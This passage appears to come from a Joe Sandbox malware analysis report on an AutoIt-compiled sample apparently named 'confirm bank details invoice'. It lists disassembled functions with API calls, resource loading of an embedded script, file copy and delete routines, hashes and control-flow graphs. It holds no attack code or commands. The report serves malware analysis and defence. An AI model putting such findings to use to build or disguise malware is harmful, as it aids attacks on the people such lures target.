                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0047449E,?,?,00000000,00000001), ref: 00474092
                    • LoadResource.KERNEL32(?,00000000,?,?,0047449E,?,?,00000000,00000001,?,?,?,?,?,?,004741FB), ref: 004E4F1A
                    • SizeofResource.KERNEL32(?,00000000,?,?,0047449E,?,?,00000000,00000001,?,?,?,?,?,?,004741FB), ref: 004E4F2F
                    • LockResource.KERNEL32(0047449E,?,?,0047449E,?,?,00000000,00000001,?,?,?,?,?,?,004741FB,00000000), ref: 004E4F42
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT
                    • API String ID: 3051347437-3967369404
                    • Opcode ID: ea8f1ee652ff0207892fb31fe83e04414f3e3539e8ddffdf4bacdc5467f08577
                    • Instruction ID: 30da49bf6aa5151e6a5f929789bcb0317d8301df5d2b2fe741f5043c1969d284
                    • Opcode Fuzzy Hash: ea8f1ee652ff0207892fb31fe83e04414f3e3539e8ddffdf4bacdc5467f08577
                    • Instruction Fuzzy Hash: 5B115770600741AFE7318B26EC48F777BBAEBC5B51F20856DF606962A0DB71DC00CA64
                    Function 00483B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception
                    • String ID: @$ S$ S$ S
                    • API String ID: 3728558374-2981100487
                    • Opcode ID: 2de07450898827caea80e73bf76c32ec3b198f78fb652bf73522e69392567e88
                    • Instruction ID: f2f760a98f977ebcabc497526d8a24ade7cc07efd31781b197d6d1d1acf67ff0
                    • Opcode Fuzzy Hash: 2de07450898827caea80e73bf76c32ec3b198f78fb652bf73522e69392567e88
                    • Instruction Fuzzy Hash: 3972DF30D042099FCF14EF95C481ABEB7B5EF48714F14845BE909AB351D738AE46CB99
                    Function 004B6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,004E2F49), ref: 004B6CB9
                    • FindFirstFileW.KERNELBASE(?,?), ref: 004B6CCA
                    • FindClose.KERNEL32(00000000), ref: 004B6CDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 6a09b146a199b9c7f00ca4c19b0895aab71eac964b42d674610c9baf3d45bab1
                    • Instruction ID: cd2b4ffdfb66a5ea08e7805cc68f1fc296df5deb1a0fba2f46ed6a694af96fbe
                    • Opcode Fuzzy Hash: 6a09b146a199b9c7f00ca4c19b0895aab71eac964b42d674610c9baf3d45bab1
                    • Instruction Fuzzy Hash: C1E0D831C104105782146738ED0D4FA3B7DDA05339F100B16F571C12D0EB78E91095EE
                    Function 00483200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: S
                    • API String ID: 3964851224-2211950704
                    • Opcode ID: f4e1079f36b5b78a01a7d430d225ac8bafe697caaac582e54468c999acf7308b
                    • Instruction ID: f7ebae158be1475f89e4db984e33c962f0e3c6276da8e7bf3ff60f9df3226a40
                    • Opcode Fuzzy Hash: f4e1079f36b5b78a01a7d430d225ac8bafe697caaac582e54468c999acf7308b
                    • Instruction Fuzzy Hash: 0E928F706083419FD724EF19C480B6BB7E1BF88708F14885EE98A8B392D779ED45CB56
                    Function 0047E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E959
                    • timeGetTime.WINMM ref: 0047EBFA
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047ED2E
                    • TranslateMessage.USER32(?), ref: 0047ED3F
                    • DispatchMessageW.USER32(?), ref: 0047ED4A
                    • LockWindowUpdate.USER32(00000000), ref: 0047ED79
                    • DestroyWindow.USER32 ref: 0047ED85
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0047ED9F
                    • Sleep.KERNEL32(0000000A), ref: 004E5270
                    • TranslateMessage.USER32(?), ref: 004E59F7
                    • DispatchMessageW.USER32(?), ref: 004E5A05
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004E5A19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 2641332412-570651680
                    • Opcode ID: fd07bd893e266024b1d3124bc87a1aa4a52b790414129e8f5fdf876dff5119ae
                    • Instruction ID: 2b5d978f1fd4bf7926653307965461a03c6475c43bc1b369532c9642fdd513ff
                    • Opcode Fuzzy Hash: fd07bd893e266024b1d3124bc87a1aa4a52b790414129e8f5fdf876dff5119ae
                    • Instruction Fuzzy Hash: FF62B670504380DFD724DF26C885BAA77E5BF48308F0449AFF94A8B292D778D849CB5A
                    Function 004A5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___createFile.LIBCMT ref: 004A5EC3
                    • ___createFile.LIBCMT ref: 004A5F04
                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004A5F2D
                    • __dosmaperr.LIBCMT ref: 004A5F34
                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 004A5F47
                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004A5F6A
                    • __dosmaperr.LIBCMT ref: 004A5F73
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004A5F7C
                    • __set_osfhnd.LIBCMT ref: 004A5FAC
                    • __lseeki64_nolock.LIBCMT ref: 004A6016
                    • __close_nolock.LIBCMT ref: 004A603C
                    • __chsize_nolock.LIBCMT ref: 004A606C
                    • __lseeki64_nolock.LIBCMT ref: 004A607E
                    • __lseeki64_nolock.LIBCMT ref: 004A6176
                    • __lseeki64_nolock.LIBCMT ref: 004A618B
                    • __close_nolock.LIBCMT ref: 004A61EB
                      • Part of subcall function 0049EA9C: CloseHandle.KERNELBASE(00000000,0051EEF4,00000000,?,004A6041,0051EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0049EAEC
                      • Part of subcall function 0049EA9C: GetLastError.KERNEL32(?,004A6041,0051EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0049EAF6
                      • Part of subcall function 0049EA9C: __free_osfhnd.LIBCMT ref: 0049EB03
                      • Part of subcall function 0049EA9C: __dosmaperr.LIBCMT ref: 0049EB25
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • __lseeki64_nolock.LIBCMT ref: 004A620D
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004A6342
                    • ___createFile.LIBCMT ref: 004A6361
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004A636E
                    • __dosmaperr.LIBCMT ref: 004A6375
                    • __free_osfhnd.LIBCMT ref: 004A6395
                    • __invoke_watson.LIBCMT ref: 004A63C3
                    • __wsopen_helper.LIBCMT ref: 004A63DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                    • String ID: @
                    • API String ID: 3896587723-2766056989
                    • Opcode ID: 76b4fec0db37177676c5cce61bc6acd49d5b08a6a23231ed9f4e78215b95fef2
                    • Instruction ID: 6f16d0eca53d4e953d3c7db3bb47afc10054d51f6f2be3b6a2a4cfaa1571a95e
                    • Opcode Fuzzy Hash: 76b4fec0db37177676c5cce61bc6acd49d5b08a6a23231ed9f4e78215b95fef2
                    • Instruction Fuzzy Hash: 542234719046059BEF259F68CD45BBE7B21EB32324F29822BE9219B3D1C23D8D50C759
                    Function 004BFA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • _wcscpy.LIBCMT ref: 004BFA96
                    • _wcschr.LIBCMT ref: 004BFAA4
                    • _wcscpy.LIBCMT ref: 004BFABB
                    • _wcscat.LIBCMT ref: 004BFACA
                    • _wcscat.LIBCMT ref: 004BFAE8
                    • _wcscpy.LIBCMT ref: 004BFB09
                    • __wsplitpath.LIBCMT ref: 004BFBE6
                    • _wcscpy.LIBCMT ref: 004BFC0B
                    • _wcscpy.LIBCMT ref: 004BFC1D
                    • _wcscpy.LIBCMT ref: 004BFC32
                    • _wcscat.LIBCMT ref: 004BFC47
                    • _wcscat.LIBCMT ref: 004BFC59
                    • _wcscat.LIBCMT ref: 004BFC6E
                      • Part of subcall function 004BBFA4: _wcscmp.LIBCMT ref: 004BC03E
                      • Part of subcall function 004BBFA4: __wsplitpath.LIBCMT ref: 004BC083
                      • Part of subcall function 004BBFA4: _wcscpy.LIBCMT ref: 004BC096
                      • Part of subcall function 004BBFA4: _wcscat.LIBCMT ref: 004BC0A9
                      • Part of subcall function 004BBFA4: __wsplitpath.LIBCMT ref: 004BC0CE
                      • Part of subcall function 004BBFA4: _wcscat.LIBCMT ref: 004BC0E4
                      • Part of subcall function 004BBFA4: _wcscat.LIBCMT ref: 004BC0F7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                    • String ID: >>>AUTOIT SCRIPT<<<$t2R
                    • API String ID: 2955681530-151873073
                    • Opcode ID: c31aee72f7804df038a7783b1cfc2d3386f165faa01c79fd118f191411eb22a2
                    • Instruction ID: 0758a785a0176a4ff91a829bac642e68c1ba5911cdeb8b7879023c35dae63b76
                    • Opcode Fuzzy Hash: c31aee72f7804df038a7783b1cfc2d3386f165faa01c79fd118f191411eb22a2
                    • Instruction Fuzzy Hash: 6A91A371504205AFDB20EB55C851EDBB7E8BF84314F00496EF94D97291DB38FA48CB99
                    Function 00473F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00473F86
                    • RegisterClassExW.USER32(00000030), ref: 00473FB0
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00473FC1
                    • InitCommonControlsEx.COMCTL32(?), ref: 00473FDE
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00473FEE
                    • LoadIconW.USER32(000000A9), ref: 00474004
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00474013
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 433446085b86216f9da4348957797ee4d975d292f47685dc387446d19bf1c5cd
                    • Instruction ID: a56db41af9fc764c62a1d3a812c0e2c44befc6e952c930ffaf6758ee0fb52bef
                    • Opcode Fuzzy Hash: 433446085b86216f9da4348957797ee4d975d292f47685dc387446d19bf1c5cd
                    • Instruction Fuzzy Hash: F021B4B5D00618AFDB009FE4E889B9DBBB5FB18704F00412AF511A62A0D7B44554DF99
                    Function 004BBFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004BBDB4: __time64.LIBCMT ref: 004BBDBE
                      • Part of subcall function 00474517: _fseek.LIBCMT ref: 0047452F
                    • __wsplitpath.LIBCMT ref: 004BC083
                      • Part of subcall function 00491DFC: __wsplitpath_helper.LIBCMT ref: 00491E3C
                    • _wcscpy.LIBCMT ref: 004BC096
                    • _wcscat.LIBCMT ref: 004BC0A9
                    • __wsplitpath.LIBCMT ref: 004BC0CE
                    • _wcscat.LIBCMT ref: 004BC0E4
                    • _wcscat.LIBCMT ref: 004BC0F7
                    • _wcscmp.LIBCMT ref: 004BC03E
                      • Part of subcall function 004BC56D: _wcscmp.LIBCMT ref: 004BC65D
                      • Part of subcall function 004BC56D: _wcscmp.LIBCMT ref: 004BC670
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004BC2A1
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004BC338
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004BC34E
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004BC35F
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004BC371
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                    • String ID:
                    • API String ID: 2378138488-0
                    • Opcode ID: d342150d949d26e4757b92f97783c11c8ec82502ba97fe01225993300b4c1240
                    • Instruction ID: 6875bc50a8fdd83b27afaf77d575f41dd135e750d2391069f7e49c900cce24f9
                    • Opcode Fuzzy Hash: d342150d949d26e4757b92f97783c11c8ec82502ba97fe01225993300b4c1240
                    • Instruction Fuzzy Hash: E2C13CB1D00129AADF11DFA5CC81EEEBBBDAF49314F0040ABF609E6151DB749A448F65
                    Function 00473742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 958 473742-473762 960 473764-473767 958->960 961 4737c2-4737c4 958->961 962 473769-473770 960->962 963 4737c8 960->963 961->960 964 4737c6 961->964 968 473776-47377b 962->968 969 47382c-473834 PostQuitMessage 962->969 966 4737ce-4737d1 963->966 967 4e1e00-4e1e2e call 472ff6 call 48e312 963->967 965 4737ab-4737b3 DefWindowProcW 964->965 976 4737b9-4737bf 965->976 970 4737f6-47381d SetTimer RegisterWindowMessageW 966->970 971 4737d3-4737d4 966->971 1005 4e1e33-4e1e3a 967->1005 973 4e1e88-4e1e9c call 4b4ddd 968->973 974 473781-473783 968->974 975 4737f2-4737f4 969->975 970->975 980 47381f-47382a CreatePopupMenu 970->980 977 4e1da3-4e1da6 971->977 978 4737da-4737ed KillTimer call 473847 call 47390f 971->978 973->975 999 4e1ea2 973->999 981 473836-473840 call 48eb83 974->981 982 473789-47378e 974->982 975->976 990 4e1ddc-4e1dfb MoveWindow 977->990 991 4e1da8-4e1daa 977->991 978->975 980->975 1000 473845 981->1000 986 4e1e6d-4e1e74 982->986 987 473794-473799 982->987 986->965 995 4e1e7a-4e1e83 call 4aa5f3 986->995 997 4e1e58-4e1e68 call 4b55bd 987->997 998 47379f-4737a5 987->998 990->975 992 4e1dac-4e1daf 991->992 993 4e1dcb-4e1dd7 SetFocus 991->993 992->998 1001 4e1db5-4e1dc6 call 472ff6 992->1001 993->975 995->965 997->975 998->965 998->1005 999->965 1000->975 1001->975 1005->965 1009 4e1e40-4e1e53 call 473847 call 474ffc 1005->1009 1009->965
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 004737B3
                    • KillTimer.USER32(?,00000001), ref: 004737DD
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00473800
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0047380B
                    • CreatePopupMenu.USER32 ref: 0047381F
                    • PostQuitMessage.USER32(00000000), ref: 0047382E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated
                    • API String ID: 129472671-2362178303
                    • Opcode ID: b250293bd631434db8553aa22fc8355c233fd7a6dfe108ed7d3ccf9edc827d3a
                    • Instruction ID: e712d0284a6554568185fff116707f5743be3156c90d3a519e4738d706990427
                    • Opcode Fuzzy Hash: b250293bd631434db8553aa22fc8355c233fd7a6dfe108ed7d3ccf9edc827d3a
                    • Instruction Fuzzy Hash: F04125F410054AA7DB186F389C4ABFA3695F710302F04C12BF90AD22A0DB6C9951B66E
                    Function 00473E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00473E79
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00473E88
                    • LoadIconW.USER32(00000063), ref: 00473E9E
                    • LoadIconW.USER32(000000A4), ref: 00473EB0
                    • LoadIconW.USER32(000000A2), ref: 00473EC2
                      • Part of subcall function 00474024: LoadImageW.USER32(00470000,00000063,00000001,00000010,00000010,00000000), ref: 00474048
                    • RegisterClassExW.USER32(?), ref: 00473F30
                      • Part of subcall function 00473F53: GetSysColorBrush.USER32(0000000F), ref: 00473F86
                      • Part of subcall function 00473F53: RegisterClassExW.USER32(00000030), ref: 00473FB0
                      • Part of subcall function 00473F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00473FC1
                      • Part of subcall function 00473F53: InitCommonControlsEx.COMCTL32(?), ref: 00473FDE
                      • Part of subcall function 00473F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00473FEE
                      • Part of subcall function 00473F53: LoadIconW.USER32(000000A9), ref: 00474004
                      • Part of subcall function 00473F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00474013
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: a5b39152dddf20fc4eddc11a08231615b0f533d058cc20269965a0148eb78c3f
                    • Instruction ID: f8da7820810fe74454faa2ff9386bd9eafab7e8cf38970e7b11d6262dad75b39
                    • Opcode Fuzzy Hash: a5b39152dddf20fc4eddc11a08231615b0f533d058cc20269965a0148eb78c3f
                    • Instruction Fuzzy Hash: 0D2132B0D00704ABCB04DFB9ED49A99BFF5FB58314F10812AE218A73A0D7755648EF99
                    Function 0049ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1022 49acb3-49ace0 call 496ac0 call 497cf4 call 496986 1029 49acfd-49ad02 1022->1029 1030 49ace2-49acf8 call 49e880 1022->1030 1031 49ad08-49ad0f 1029->1031 1038 49af52-49af57 call 496b05 1030->1038 1033 49ad11-49ad40 1031->1033 1034 49ad42-49ad51 GetStartupInfoW 1031->1034 1033->1031 1036 49ae80-49ae86 1034->1036 1037 49ad57-49ad5c 1034->1037 1041 49ae8c-49ae9d 1036->1041 1042 49af44-49af50 call 49af58 1036->1042 1037->1036 1040 49ad62-49ad79 1037->1040 1044 49ad7b-49ad7d 1040->1044 1045 49ad80-49ad83 1040->1045 1046 49ae9f-49aea2 1041->1046 1047 49aeb2-49aeb8 1041->1047 1042->1038 1044->1045 1049 49ad86-49ad8c 1045->1049 1046->1047 1050 49aea4-49aead 1046->1050 1051 49aeba-49aebd 1047->1051 1052 49aebf-49aec6 1047->1052 1055 49adae-49adb6 1049->1055 1056 49ad8e-49ad9f call 496986 1049->1056 1057 49af3e-49af3f 1050->1057 1054 49aec9-49aed5 GetStdHandle 1051->1054 1052->1054 1058 49af1c-49af32 1054->1058 1059 49aed7-49aed9 1054->1059 1061 49adb9-49adbb 1055->1061 1067 49ae33-49ae3a 1056->1067 1068 49ada5-49adab 1056->1068 1057->1036 1058->1057 1064 49af34-49af37 1058->1064 1059->1058 1062 49aedb-49aee4 GetFileType 1059->1062 1061->1036 1065 49adc1-49adc6 1061->1065 1062->1058 1066 49aee6-49aef0 1062->1066 1064->1057 1069 49adc8-49adcb 1065->1069 1070 49ae20-49ae31 1065->1070 1072 49aefa-49aefd 1066->1072 1073 49aef2-49aef8 1066->1073 1074 49ae40-49ae4e 1067->1074 1068->1055 1069->1070 1071 49adcd-49add1 1069->1071 1070->1061 1071->1070 1075 49add3-49add5 1071->1075 1077 49af08-49af1a InitializeCriticalSectionAndSpinCount 1072->1077 1078 49aeff-49af03 1072->1078 1076 49af05 1073->1076 1079 49ae50-49ae72 1074->1079 1080 49ae74-49ae7b 1074->1080 1081 49ade5-49ae1a InitializeCriticalSectionAndSpinCount 1075->1081 1082 49add7-49ade3 GetFileType 1075->1082 1076->1077 1077->1057 1078->1076 1079->1074 1080->1049 1083 49ae1d 1081->1083 1082->1081 1082->1083 1083->1070
                    APIs
                    • __lock.LIBCMT ref: 0049ACC1
                      • Part of subcall function 00497CF4: __mtinitlocknum.LIBCMT ref: 00497D06
